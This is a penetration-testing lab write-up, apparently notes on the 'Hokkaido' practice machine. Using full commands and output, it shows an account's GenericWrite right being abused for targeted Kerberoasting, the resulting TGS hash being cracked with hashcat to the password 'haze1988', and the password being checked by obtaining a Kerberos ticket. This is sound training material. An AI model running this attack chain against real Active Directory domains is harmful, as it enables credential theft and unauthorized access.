GenericWrite

During the BloodHound enumeration, it has been identified that the hrapp-service account has GenericWrite access over the hazel.green user

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ KRB5CCNAME=hrapp-service@dc.hokkaido-aerospace.com.ccache bloodyAD -d HOKKAIDO-AEROSPACE.COM -k --host dc.hokkaido-aerospace.com get writable       
 
distinguishedName: CN=Hazel Green,OU=admins,OU=it,DC=hokkaido-aerospace,DC=com
permission: WRITE
 
[...REDACTED...]
 
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ KRB5CCNAME=hrapp-service@dc.hokkaido-aerospace.com.ccache powerview HOKKAIDO-AEROSPACE.COM/@dc.hokkaido-aerospace.com --no-pass -k -ns $IP --use-ldaps --dc-ip $IP -q 'Get-DomainObjectAcl -Identity hazel.green -SecurityIdentifier hrapp-service'
Logging directory is set to /home/kali/.powerview/logs/hokkaido-aerospace-dc.hokkaido-aerospace.com
[2025-04-25 17:56:12] [Storage] Using cache directory: /home/kali/.powerview/storage/ldap_cache
ObjectDN                    : CN=Hazel Green,OU=admins,OU=it,DC=hokkaido-aerospace,DC=com
ObjectSID                   : S-1-5-21-3227296914-974780204-1325941497-1106
ACEType                     : ACCESS_ALLOWED_ACE
ACEFlags                    : None
ActiveDirectoryRights       : ReadControl,WriteProperties,ReadProperties,Self,ListChildObjects
AccessMask                  : ReadControl,WriteProperties,ReadProperties,Self,ListChildObjects
InheritanceType             : None
SecurityIdentifier          : HOKKAIDO-AEROSPACE\hrapp-service

This could be confirmed using bloodyAD and PowerView

When the GenericWrite access is granted over a user object, targeted Kerberoasting can be leveraged

Targeted Kerberoasting

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ KRB5CCNAME=hrapp-service@dc.hokkaido-aerospace.com.ccache impacket-targetedKerberoast -d HOKKAIDO-AEROSPACE.COM --dc-host dc.hokkaido-aerospace.com --no-pass -k --use-ldaps --dc-ip $IP --request-user hazel.green      
[*] Starting kerberoast attacks
[*] Attacking user (hazel.green)
[+] Printing hash for (Hazel.Green)
$krb5tgs$23$*Hazel.Green$HOKKAIDO-AEROSPACE.COM$HOKKAIDO-AEROSPACE.COM/Hazel.Green*$dd2af4dc3b1c12fe798065baadd18881$40c3a2c3e4753b74a99d1fce761e6a4328cf9f968f687a0340f548657ad191c9c032f604da8263a2268aa5c260b70cd8070576c630f3bfeb36ef8c0995a4b7102488bf423faf79734a6df28875b2791fd285281d1853656cee7c00f2088f3af077ef2645d7f8483bba6ee7ffcb4f4dcdd400439929f88e9dc3233da70ee535610bbd602f52cab595bbb587e5f2b677e753ba3672a6f1bb29a893993b3f3f1074c0270e9f235ed5d5aeebae8141d0a1c4f9f6d5ce2802ddd16e6df0fd2df1d8c4df94882cbcb8cbeb07fe1f2d1b77f6c9b61374cf190e649d7a1f143457ebde91ed6758ab413922444a864eba5dc3b33f350dd997352940277988ec383b623085d19b5aeffd30dac9abd11327bb629b199ebb66541e43e169a673730f374cc72fad99355bf10013966f73b278e910ce5ac25088a1dcfb3a2b9f1fee0d50c9ecff6e70958302545ab8cf115ee258e4c27da92ef90917602d5f3b9414fa7afd02030c775cf8cf45b682349b50776808102267f1157f6d52b7f3c094211b2748fe3bc732075813ae2dfee7e1fdf1dcc4eef0536decb877f6271caf377ecd756dcf1c66e0dd61019bdf5e21dea5e04bc242e138d556533477629b3a129440663a43d5e3294b96d81647bd8f489b765739bba9e12523383e0990fd2f536fc87664004e63273871dadd05fd1d5701fafa4e3db94feed37c3ec55778e6c152b08aa586745c0bdb48ee8958c7c71f168fe7d61f10067346ca83a0b08af28d6aa9a9089392aba65669534737c99154f1d6cab4e3303a492ee3bb375bd3b8cab753d2a1799429545dc5c82e1568a5730f4a4910b0c8caac07255ffa74a7b1c9e67a9debe9d12fc7d656a31af77bc783ebcd3f79a7ba6788b64a1104105780d2318f4aca7c26b89b62c2da9db0adb7d72515957aab1e25e115070528d88bc666b73573d707e3d364f294490fa493b3e0cc782ccff14514aa1580b027271d86421b246426cb950040de4693bd931ee8bc2982d4f0024634aba10b0cd5d6e0e9db89bfb79e15e25bf08f50d0ac7a46d515cde1c2f6c0f61d9e11df6ac76183a58f4353621aae8aef14470c633c1f88b4c3ecb5f6965df6edcfba1bd457221512cae8076da84d3d1a6205abb1755025bb8542ca66dc1154d43e6e1a3411f06dcf89c253312db10de04c542a32bcf1aba86d82841e26e0f0957b07af6f8c25317e24f1fc68a17157c58bc96c13f9d9df16a6d0d34d4f0e5ea37b6c3a051b7b5d7562e6e4f1f54b92d0b86e6fa5a9fdcca150266135afaba55e21be083b9faa5f3eb46255dc5a9d341a423fe3724c48dba54afe91e068712a0d0d8f57518e835045223133a0471797c032157b03ad80a40de287d799fe9f82fade27a4be9c103ca964f8e8c4513ea11566e0193c0c122f83c987a1fc04fa05bc9f56739393127cc96a01536406240fa6c5ab86e92b62f8c8a1eba263300b8f57bffa238f19a1f7f20d8e47dc3813fb7b750fe1eb56f7229ca05ac90ccc72da82ab32d1f175986e727f5463e3aa797458bddf05dda98d06cd85f32e7e3d6d9493c69d99cfbdeb5a4fe422f980c02120297a316a308b31ee1351153e359f9eecbe56e9ef653dcb3626c224ef44defddd8f3af27c5b1eea355c90d7db

Using the TGT of the hrapp-service account, conducting a targeted Kerberoasting to the hazel.green user with targetedKerberoast.py TGS-REP hash returned

Password Cracking

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ hashcat -a 0 -m 13100 hazel.green.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
$krb5tgs$23$*Hazel.Green$HOKKAIDO-AEROSPACE.COM$HOKKAIDO-AEROSPACE.COM/Hazel.Green*$dd2af4dc3b1c12fe798065baadd18881$40c3a2c3e4753b74a99d1fce761e6a4328cf9f968f687a0340f548657ad191c9c032f604da8263a2268aa5c260b70cd8070576c630f3bfeb36ef8c0995a4b7102488bf423faf79734a6df28875b2791fd285281d1853656cee7c00f2088f3af077ef2645d7f8483bba6ee7ffcb4f4dcdd400439929f88e9dc3233da70ee535610bbd602f52cab595bbb587e5f2b677e753ba3672a6f1bb29a893993b3f3f1074c0270e9f235ed5d5aeebae8141d0a1c4f9f6d5ce2802ddd16e6df0fd2df1d8c4df94882cbcb8cbeb07fe1f2d1b77f6c9b61374cf190e649d7a1f143457ebde91ed6758ab413922444a864eba5dc3b33f350dd997352940277988ec383b623085d19b5aeffd30dac9abd11327bb629b199ebb66541e43e169a673730f374cc72fad99355bf10013966f73b278e910ce5ac25088a1dcfb3a2b9f1fee0d50c9ecff6e70958302545ab8cf115ee258e4c27da92ef90917602d5f3b9414fa7afd02030c775cf8cf45b682349b50776808102267f1157f6d52b7f3c094211b2748fe3bc732075813ae2dfee7e1fdf1dcc4eef0536decb877f6271caf377ecd756dcf1c66e0dd61019bdf5e21dea5e04bc242e138d556533477629b3a129440663a43d5e3294b96d81647bd8f489b765739bba9e12523383e0990fd2f536fc87664004e63273871dadd05fd1d5701fafa4e3db94feed37c3ec55778e6c152b08aa586745c0bdb48ee8958c7c71f168fe7d61f10067346ca83a0b08af28d6aa9a9089392aba65669534737c99154f1d6cab4e3303a492ee3bb375bd3b8cab753d2a1799429545dc5c82e1568a5730f4a4910b0c8caac07255ffa74a7b1c9e67a9debe9d12fc7d656a31af77bc783ebcd3f79a7ba6788b64a1104105780d2318f4aca7c26b89b62c2da9db0adb7d72515957aab1e25e115070528d88bc666b73573d707e3d364f294490fa493b3e0cc782ccff14514aa1580b027271d86421b246426cb950040de4693bd931ee8bc2982d4f0024634aba10b0cd5d6e0e9db89bfb79e15e25bf08f50d0ac7a46d515cde1c2f6c0f61d9e11df6ac76183a58f4353621aae8aef14470c633c1f88b4c3ecb5f6965df6edcfba1bd457221512cae8076da84d3d1a6205abb1755025bb8542ca66dc1154d43e6e1a3411f06dcf89c253312db10de04c542a32bcf1aba86d82841e26e0f0957b07af6f8c25317e24f1fc68a17157c58bc96c13f9d9df16a6d0d34d4f0e5ea37b6c3a051b7b5d7562e6e4f1f54b92d0b86e6fa5a9fdcca150266135afaba55e21be083b9faa5f3eb46255dc5a9d341a423fe3724c48dba54afe91e068712a0d0d8f57518e835045223133a0471797c032157b03ad80a40de287d799fe9f82fade27a4be9c103ca964f8e8c4513ea11566e0193c0c122f83c987a1fc04fa05bc9f56739393127cc96a01536406240fa6c5ab86e92b62f8c8a1eba263300b8f57bffa238f19a1f7f20d8e47dc3813fb7b750fe1eb56f7229ca05ac90ccc72da82ab32d1f175986e727f5463e3aa797458bddf05dda98d06cd85f32e7e3d6d9493c69d99cfbdeb5a4fe422f980c02120297a316a308b31ee1351153e359f9eecbe56e9ef653dcb3626c224ef44defddd8f3af27c5b1eea355c90d7db:haze1988
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*Hazel.Green$HOKKAIDO-AEROSPACE.COM$HOK...90d7db
Time.Started.....: Fri Apr 25 18:02:11 2025 (2 secs)
Time.Estimated...: Fri Apr 25 18:02:13 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  3693.5 kH/s (1.95ms) @ Accel:1024 Loops:1 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 7667712/14344385 (53.45%)
Rejected.........: 0/7667712 (0.00%)
Restore.Point....: 7655424/14344385 (53.37%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: hcwarmia7 -> havitaytay
Hardware.Mon.#1..: Util: 47%
 
Started: Fri Apr 25 18:02:10 2025
Stopped: Fri Apr 25 18:02:15 2025

TGS-REP hash cracked; haze1988

Validation

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ impacket-getTGT HOKKAIDO-AEROSPACE.COM/hazel.green@dc.hokkaido-aerospace.com -dc-ip $IP 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: haze1988
[*] Saving ticket in hazel.green@dc.hokkaido-aerospace.com.ccache

Validated TGT generated for the hazel.green user

InfoSec LAB

Explorer

Hokkaido_GenericWrite

GenericWrite

Targeted Kerberoasting

Password Cracking

Validation

Interactive Graph View

Table of Contents

Backlinks